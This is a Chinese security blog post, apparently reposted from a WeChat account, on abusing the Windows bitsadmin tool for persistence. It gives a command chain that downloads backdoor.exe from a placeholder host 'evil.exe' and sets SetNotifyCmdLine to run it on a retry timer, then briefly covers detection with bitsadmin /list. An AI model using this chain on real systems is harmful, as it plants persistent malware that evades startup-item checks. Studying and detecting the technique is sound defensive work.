【权限维持技术】Windows Bitsadmin命令

admin

102360
文章

87
评论

2024年2月15日14:34:28评论10 views字数 916阅读3分3秒阅读模式

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

Bitsadmin

Bitsadmin是Windows操作系统中的一个命令行工具，用于创建下载或上传作业并监控它们的进度。一个作业可以包含多个文件。

Bitsadmin 是使用后台智能传输服务（BITS）的方式进行的，因此即使链接临时中断，文件传输也不会失败。

【权限维持技术】Windows Bitsadmin命令

bitsadmin工具用法示例：

bitsadmin /create myDownloadJob bitsadmin /addfile myDownloadJob https://example.com/file.zip C:pathtofile.zip bitsadmin /resume myDownloadJob

上述示例会创建一个名为“myDownloadJob”的下载作业，将一个文件从指定的URL下载到本地指定路径，然后开始该作业。

复现

Bitsadmin可以允许用户执行cmd命令，因此可以利用这个特性来进行权限维持
首先构建好我们的Bitsadmin命令：

bitsadmin /create backdoorbitsadmin /addfile backdoor "http://evil.exe/backdoor.exe"  "C:1.exe"bitsadmin /SetNotifyCmdLine backdoor C:1.exe NULbitsadmin /SetMinRetryDelay "backdoor" 60 bitsadmin /resume backdoor

3. 这一段命令的含义为：

创建作业，名为backdoor
使用addfile将文件保存本地
使用SetNotifyCmdLine设定将执行的命令
使用SetMinRetryDelay定义时间回调（秒）
开始工作

4. 执行后即可等待上线

防范

建议直接删除该工具，因为绝大部分情况下不需要
这种方法可以绕过目前所有启动项检查工具，需要通过bistamin命令检测：
```
bitsadmin /list /allusers /verbose
```

原文始发于微信公众号（赛博安全狗）：【权限维持技术】Windows Bitsadmin命令

左青龙
微信扫一扫

右白虎
微信扫一扫

【权限维持技术】Windows Bitsadmin命令

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

发表评论

在线咨询

微信